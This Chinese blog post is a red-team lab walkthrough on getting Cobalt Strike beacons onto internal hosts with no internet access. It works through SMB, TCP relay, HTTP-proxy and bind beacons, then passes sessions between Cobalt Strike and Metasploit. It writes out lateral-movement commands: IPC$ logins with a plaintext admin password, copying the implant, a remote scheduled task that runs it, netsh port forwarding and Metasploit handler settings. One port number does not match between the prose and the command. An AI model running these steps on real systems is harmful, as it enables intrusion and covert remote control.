首页 > 其他分享 >内网穿透之不出网上线CobaltStrike技巧

内网穿透之不出网上线CobaltStrike技巧

时间:2024-06-30 20:09:34浏览次数:17  
标签:上线 http 主机 穿透 Beacon 监听器 CobaltStrike cs 之不出

目录

前言

出网or不出网?

目标可以正常访问互联网,可直接在目标机挂socks代理或直接CS上线。而更多的情况是,内网中的服务器和主机不通外网,这样通常情况是无法直接实现CS上线操作的。

不出网的原因无外乎两种:

  • 网络协议被限制

  • 网络通信不通

解决办法也有两种:

  • 隧道技术:将一种网络协议的数据封装在另一种网络协议的数据包中传输,绕过网络协议的限制

  • 代理技术:利用出网的跳板机作为代理,间接上线不出网的主机

环境搭建:

内网环境继续使用之前的红日靶场:作为web服务器的win7主机采用双网卡,内网的2003和2008均不出网。

smb beacon上线

官网介绍:

SMB Beacon使用命名管道通过父级Beacon进行通信,当两个Beacon连接后,子Beacon从父Beacon获取到任务并发送。因为连接的Beacon使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽。

image

上面这个图就可以说明它们之间的关系,上线跳板机的是父Beacon,SMB Beacon作为子Beacon获取任务通过SMB隧道发送给目标主机。

SMB Beacon的使用条件如下:

  • 具有SMB Beacon的主机必须接受445端口上的连接

  • 只能链接由同一个CobaltStrike实例管理的Beacon

  • 利用这种Beacon横移必须有目标主机的管理员权限或者拥有具有管理员权限的凭据

使用HTTP Beacon上线win7跳板机:

image

创建一个SMB Beacon监听器:

image

进入Beacon控制台,输入spawn SMB Beacon的监听器名称派生会话,运行成功后在external中可以看到IP后有个∞∞字符的派生SMB Beacon。

image

下一步利用派生的SMB Beacon来上线不出网主机,前提是已知目标机器的管理员账号的明文密码或密码哈希,利用SMB Beacon正向连接让其上线。

抓取hash和明文密码,获取密码凭证,选择目标主机OWA(win 2008)选择使用psexec64横向移动:

image

内网OWA主机成功上线:

image

运行成功后在external中可以看到IP后有个∞∞字符,这是派生的SMB Beacon。

tcp listener转发上线

在已上线的win7跳板机创建listener,设置监听器代理转发:

image

转发监听器可以利用己攻陷的win7作为代理,为其他Beacon会话的中转网络流量:

image

生成一个stageless木马:

image

image

将木马上传至win7跳板机:

image

与目标主机建立IPC$连接:

shell net use \\192.168.52.138\C$ /user:Administrator "hongrisec@2019"

image

将win7跳板机的木马文件copy到目标主机的C共享盘下:

shell copy C:\phpStudy\WWW\beacon_x64.exe \\192.168.52.138\C$

image

远程创建目标主机计划任务执行木马:

shell schtasks /create /s 192.168.52.138 /u Administrator /p "hongrisec@2019" /sc MINUTE /mo 1 /tn test /tr "C:\beacon_x64.exe"

image

此时跳板机4444端口监听器会等待目标主机木马反弹连接,然后将流量转发到cs上线。

http代理上线

需要使用到代理工具goproxy来搭建http代理,项目地址:https://github.com/snail007/goproxy

上传proxy.exe到web服务器,在8080端口开启http代理:

shell C:\phpStudy\WWW\proxy.exe http -t tcp -p "0.0.0.0:8080" --daemon

然后再使用netsh命令在win7跳板机上做一个端口转发,将内网的822端口转发到外网的8080上:

netsh interface portproxy add v4tov4 listenaddress=192.168.52.143 listenport=3422 connectaddress=192.168.88.146 connectport=8080

image

设置一个HTTP Beacon监听器,http代理设置为win7跳板机内网的822端口:

image

生成一个stageless木马,选择为刚才设置过http代理的监听器:

image

然后将生成的木马上传至win7跳板机,再由跳板机与目标主机建立IPC$连接,将木马上传到目标主机,远程创建目标机计划任务执行木马。

木马会去连接822端口,win7再将822端口的http流量转发到外网的8080,最后由8080端口将流量转发到cs上线。

连接过程:

192.168.52.138(OWA) --> 192.168.52.143:822 --> 192.168.88.146:8080 --> 192.168.88.128:81(CS)

image

遇到一个很头疼的问题,当执行netsh命令后,在0.0.0.0监听的8080就消失了......

tcp beacon正向连接上线

tcp beacon正向连接和smb上线很类似,smb beacon是主动连接目标主机445端口建立smb隧道。而tcp正向连接是利用已上线跳板机主动与上传了木马的目标主机建立tcp连接,从而上线目标主机。

设置一个tcp正向连接的监听器:

image

使用tcp正向连接的监听器生成stageless木马:

image

还是上面一样,还是利用跳板机与目标主机建立IPC$连接,上传木马到目标主机:

shell net use \\192.168.52.138\C$ /user:Administrator "hongrisec@2019"

shell copy C:\phpStudy\WWW\b_beacon_x64.exe \\192.168.52.138\C$

image

跳板机执行connect指令连接目标主机木马:

image

内网OWA主机成功上线。

题外话 — cs和msf的权限传递

当目标上线cs以后,可以轻松地将cs权限转移到msf上,继续借助msf完成后续的渗透。

环境:msf6 + cs4.8

cs派生给msf

1)在msf上启用reverse_http模块监听本地端口:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.88.128
set lport 4444

image

2)在cs上创建一个foreign http监听,ip和端口设置为msf监听的ip和端口:

Foreign监听器支持与其他软件的监听器进行派生(spawn)

image

3)右键 —> 凭证提权 —> 新建会话 —> 选择创建的foreign http监听:

image

msf成功拿到会话:

image

msf派生给cs

条件:msf已获取meterpreter shell

image

在cs上创建一个http beacon的监听器:

image

msf启用payload_inject模块,将ip和端口设置为cs监听的ip和端口:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.88.128
set lport 4567
set session 1
set DisablePayloadHandler true

注意:msf的payload和cs的监听器要保持一致

image

cs成功拿到会话:

image

总结:

对于这种边缘主机可以出网的情况,主要思路就是借助边缘的跳板机作为代理把内网主机带出,再或者是跳板机正向去连接内网主机。个人感觉代理转发的方式成功率比较低......步骤越多越容易失败。

参考文章:
https://xz.aliyun.com/t/13918
https://xz.aliyun.com/t/8671


若有错误,欢迎指正!o( ̄▽ ̄)ブ

标签:上线,http,主机,穿透,Beacon,监听器,CobaltStrike,cs,之不出
From: https://www.cnblogs.com/smileleooo/p/18275805

相关文章

  • 免费内网穿透工具 ,快解析内网穿透解决方案
    在IPv4公网IP严重不足的环境下,内网穿透技术越来越多的被人们所使用,使用内网穿透技术的好处有很多。1:无需公网ip物以稀为贵,由于可用的公网IP地址越来越少,价格也是水涨船高,一个固定公网IP一年的成本要上万,而使用内网穿透技术则不需要公网IP的支持。2:提高安全性使用内网穿透技......
  • 免费内网穿透工具 ,快解析内网穿透解决方案
    在IPv4公网IP严重不足的环境下,内网穿透技术越来越多的被人们所使用,使用内网穿透技术的好处有很多。1:无需公网ip物以稀为贵,由于可用的公网IP地址越来越少,价格也是水涨船高,一个固定公网IP一年的成本要上万,而使用内网穿透技术则不需要公网IP的支持。2:提高安全性使用内网穿透技......
  • 快解析内网穿透助力外贸管理行业应对多种挑战
    近年来,我国外贸发展机遇前所未有,货物与服务贸易总额跃升至全球首位,贸易伙伴扩展至230多个国家和地区。我国出台了多轮稳外贸政策措施,出口退税进度不断加快,贸易便利化协定全面落实,跨境贸易便利化水平不断提升,共建“一带一路”迈进高质量发展阶段,对外开放水平全面提高,国际社会......
  • 快解析内网穿透助力外贸管理行业应对多种挑战
    近年来,我国外贸发展机遇前所未有,货物与服务贸易总额跃升至全球首位,贸易伙伴扩展至230多个国家和地区。我国出台了多轮稳外贸政策措施,出口退税进度不断加快,贸易便利化协定全面落实,跨境贸易便利化水平不断提升,共建“一带一路”迈进高质量发展阶段,对外开放水平全面提高,国际社会......
  • 免费内网穿透工具 ,快解析内网穿透解决方案
    在IPv4公网IP严重不足的环境下,内网穿透技术越来越多的被人们所使用,使用内网穿透技术的好处有很多。1:无需公网ip物以稀为贵,由于可用的公网IP地址越来越少,价格也是水涨船高,一个固定公网IP一年的成本要上万,而使用内网穿透技术则不需要公网IP的支持。2:提高安全性使用内网穿透技......
  • frp实现内网穿透让你的家里云秒变服务器手把手教程
    一、基本环境1可以有公网IP的实体机(比如vps等)(操作之前放行防火墙或者关闭  阿里云  腾讯带安全组的,请安全组先放行端口)2目标设备(就是你内网中的机器)3.公网云服务器需要安装宝塔、家里云或者家里电脑也需要装宝塔【linux】且双方都需要安装docker服务......
  • CobaltStrike的狩猎与反狩猎
    0x01前言 又到了xxx的时间了,在对红队基础设施的准备时写下的这篇文章0x02开始狩猎 CobaltStrike版本:4.9.1不做任何配置启动teamserver使用默认配置的生成x64位beacon,上线pid为30400x021BeaconEye BeaconEye 的核心原理是通过扫描CobaltStrike中的内存特征,并进行Be......
  • Frp内网穿透
    Frp内网穿透1.Frp简介frp是一款高性能的反向代理应用,专注于内网穿透。它支持多种协议,包括TCP、UDP、HTTP、HTTPS等,并且具备P2P通信功能。使用frp,您可以安全、便捷地将内网服务暴露到公网,通过拥有公网IP的节点进行中转。学习Frp最好的文档还是官方文档!官方文档链接:ht......
  • Docker搭建FRP+OPENVPN+Prometheus+Grafana 实现内网穿透以及流量监控
    Docker搭建FRP+OPENVPN+Prometheus+Grafana实现内网穿透以及流量监控文章目录Docker搭建FRP+OPENVPN+Prometheus+Grafana实现内网穿透以及流量监控一、搭建Docker基础环境二、配置FRP,实现端口映射2.1使用Docker部署FRPFrps服务端(拥有公网IP)Frpc客户端(内网IP)三、搭建......
  • redis常用5种数据类型及其常见问题(缓存穿透,缓存击穿,缓存雪崩)
    1.字符串(String)2.哈希(hash):redishash是一个string类型的字段和value的映射表,hash特别适合存储对象3.列表(List):字符串列表,按照插入的顺序。可以添加一个元素到列表的头部或尾部4.集合(set):String类型的无序集合。集合成员不可重复,redis中集合通过哈希表实现的,添加,删除,查找复杂度......